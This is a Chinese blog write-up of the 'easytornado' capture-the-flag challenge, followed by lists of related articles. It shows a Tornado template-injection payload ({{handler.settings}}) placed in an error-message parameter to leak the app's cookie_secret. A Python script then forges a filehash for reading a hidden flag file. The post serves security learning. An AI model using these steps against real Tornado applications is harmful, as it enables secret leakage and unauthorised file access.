easytornado-攻防世界

最新推荐文章于 2024-05-28 12:13:49 发布
最新推荐文章于 2024-05-28 12:13:49 发布
阅读量494 收藏 14
点赞数 10
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/szhangliwenya/article/details/137465054
版权

题目

看到flag.txt点击进去

 

题中提示render 

可以观察url

 

61.147.171.105:51567/file?filename=/hints.txt&filehash=61c9f13a8bae46973d56ca4a693847d5

 

由文件名和文件的hash值可查询对应文件内容,现在就差个cookie_secret不知道

那么如何获得cookie_secret呢?

查到cookie_secret在application对象settings属性中,

self.application.settings可以用handler替代

handler指向处理当前这个页面的RequestHandler对象, RequestHandler.setting指向self.application.settings,因此构造payload

{{handler.settings}}

Tornado全称Tornado Web Server,是一个用Python语言写成的Web服务器兼Web应用框架

tornado render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,不仅可以注入XSS代码,而且还可以通过{{}}进行传递变量和执行简单的表达式

tornado render模板注入

SSTI模板注入学习 - fdx_xdf - 博客园 (cnblogs.com)

查询到可以使用{{handler.settings}}获取服务器的配置文件信息

playload

/file?filename={{handler.settings }}

报错了

61.147.171.105:51567/error?msg=Error

观察到Error与下方Error报错信息相同

将读取配置文件的代码放到msg后面。
构造payload:

error?msg={{handler.settings}} 

成功拿到 

'cookie_secret': 'a4860747-2d1b-4084-815e-56d946ad036f'}

import hashlib
def md5(message):
    md5 = hashlib.md5()
    md5.update(message.encode('utf-8'))
    return md5.hexdigest()

def main(salt, name):
    print(md5(salt + md5(name)))


if __name__ == "__main__":
    cookie_secret='a4860747-2d1b-4084-815e-56d946ad036f'
    filename = "/fllllllllllllag"
    main(cookie_secret, filename)
 

 

 

 

73e4ae0d5195c1529b924a29c28823c7

拿到了最后的md5值 ,但是搞了半天flag不出来。

61.147.171.105:51567/file?filename=/fllllllllllllag&filehash=73e4ae0d5195c1529b924a29c28823c7

20_aw
关注
  • 10
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界】十六 --- easytornado --- python Tornado框架
qq_43168364的博客
12-28 354
题目 — easytornado 一、writeup 主页有三个文件 分别访问以下可以看到他们的URL格式如下图所示 都是文件名带一个filehash的格式,那就可以猜测访问flag文件的url格式应该就是:/file?filename=/flag的文件名&filehash=xxx。接下来依次看这几个文件的内容。/flag.txt文件 提示flag在:/fllllllllllllag中,我们的URL格式又进一步确定了:/file?filename=/fllllllllllllag&fi
level0 -- 攻防世界新手题
01-19
来自攻防世界的pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
攻防世界easytornado-tornado模板注入
yuanxu8877的博客
11-28 354
攻防世界easytornado-tornado模板注入
攻防世界-easytornado
m0_49025459的博客
12-22 1169
简单来说,就是网站内容的动态部分,如果有一个网站的内容几乎相同,但只有某些部分发生改变,那么他们很有可能使用了模板模板看起来如下:hello{user.name} 他们有一个静态罐和一个动态罐,hello为静态罐,{}里的内容为动态罐这就是为什么编译器如何是知道该部分是动态的,另外需要注意的是,并非是所有模板看起来都是像上面那样,列如:hello{{user.name}}这是一个名为jinja。
攻防世界--Web进阶--easytornado---模板注入
z2560088的博客
10-11 240
目录 信息搜集 模板注入 生成filehash 信息搜集 发现flag的位置,于是我们试试能不能访问 报错了 查看/welcome.txt 由于render({options})可以猜测有模板注入漏洞。 /hints.txt提醒md5(cookie_secret+md5(filename)) 这个应该是file的hash算法了 filename应该是/fllllllllllllag cookie_secret不清楚 模板注入...
攻防世界-web-easytornado
wuh2333的博客
07-19 1471
攻防世界,模板注入
攻防世界-easytornado wp
m0_47571887的博客
11-02 82
打开后发现有三个文件依次点开 发现flag在fllllllllllllag里面,访问fllllllllllllag。发现报错 看到hints.txt发现MD5(cookie_secret+md5(filename)) 得出fllllllllllllag=MD5(cookie_secret+md5(/fllllllllllllag)) 也就是我们计算出MD5值就可以拿到flag,问题来了,如何知道cookie_secret值是多少,百度了一下发现报错页面存在着SSTI模板注入(知...
攻防世界-web easytornado
m0_48108919的博客
02-11 697
题目描述:Tornado 框架 显示有3 个文件 1.访问flag.txt文件提示flag在fllllllllllllag文件中 2.访问welcome.txt文件,提示render render是一个Tomado框架的一个渲染函数,即可以通过传递不同的参数形成不同的页面,可能存在模板注入漏洞 3.访问hints.txt文件,看到有个md5加密方法,再看请求的url发现每个url都带有filehash,应该就是filehash的加密公式 根据url特征需要提供filename及.
攻防世界 web进阶区 easytornado
m0_51395584的博客
06-17 408
攻防世界 web进阶区 easytornado Tornado 框架的漏洞利用
攻防世界 easytornado 详解
xmj818719的博客
03-28 841
Tornado框架 第一任务先找cookie_secret 没什么头绪,直接访问http://111.200.241.244:59809/file?filename=/fllllllllllllag&filehash=7bc08cbde1fe13f5898f51b5470dc21d 回想起前段时间做的py模板注入,用同样的方法试一下 还是无果 最后动用谷歌寻找框架漏洞 网上搜罗框架漏洞资料,资料大概意思是可用 handler.settings 访问配置文件 http...
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界nice-bgm杂项
11-20
攻防世界nice_bgm杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953246
简单3步,ERP、OA、CRM等客户端,安全远程访问服务端
oray2013的专栏
05-22 279
然而,如何确保在不同地点的员工都能安全、便捷地访问公司内网的C/S(Client/Server)架构办公系统,是一个亟待解决的问题。采用贝锐花生壳内网穿透服务,可以简化这些步骤,使得远程访问变得异常简单。无需公网IP,无需繁琐的路由和网关配置,简单三步,即可实现远程访问。目前,除了上述举例的ERP系统,市面上主流C/S(Client/Server)架构办公系统均可搭配贝锐花生壳实现远程访问。传统的远程访问解决方案往往需要复杂的网络配置,包括公网IP的申请、路由和网关的设置等。
汽车制造业安全有效的设计图纸文件外发系统是什么样的?
最新发布
镭速的博客
05-28 410
在汽车制造的设计图发送过程中,安全和效率是公司最关心的两个点。镭速凭借它的高效稳定的传送性能、强大的安全特性、灵活的权限控制和全方位的服务,给企业提供了一个既安全又可靠、既高效又高效的设计图发送解决方案。随着公司对数据安全和工作效率的要求越来越高,镭速肯定会成为汽车制造公司设计图发送的首选。
F5发布2024年5月季度安全通告
2401_84434570的博客
05-22 1279
F5 BIG-IP Next Central Manager OData注入漏洞。F5 BIG-IP Next Central Manager SQL注入漏洞。F5 BIG-IP Next Central Manager中间人攻击漏洞。F5 BIG-IP Next Central Manager中间人攻击漏洞。F5 BIG-IP APM浏览器网络访问VPN客户端来源验证错误漏洞。F5 BIG-IP Next CNF信息泄露漏洞。F5 BIG-IP配置实用程序跨站脚本漏洞。
训练-斯蒂加诺-1攻防世界
03-29
训练-斯蒂加诺-1攻防世界是一款以网络安全为主题的模拟游戏,旨在训练玩家在攻击和防御方面的技能。 玩家将扮演一位黑客或安全专家,通过模拟网络环境进行攻击和防御,学习如何保护自己的网络免受攻击,并学习如何攻击他人的网络。游戏中会有各种不同的挑战和任务,例如破解密码、窃取信息、防止攻击等等。 通过完成任务,玩家可以获得经验值和奖励,提升自己的技能和装备。同时,游戏还提供了实时排行榜,让玩家可以与其他玩家竞争,展示自己的技能和成就。 总之,训练-斯蒂加诺-1攻防世界是一款有趣和富有挑战性的游戏,可以帮助玩家学习和提高网络安全方面的技能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值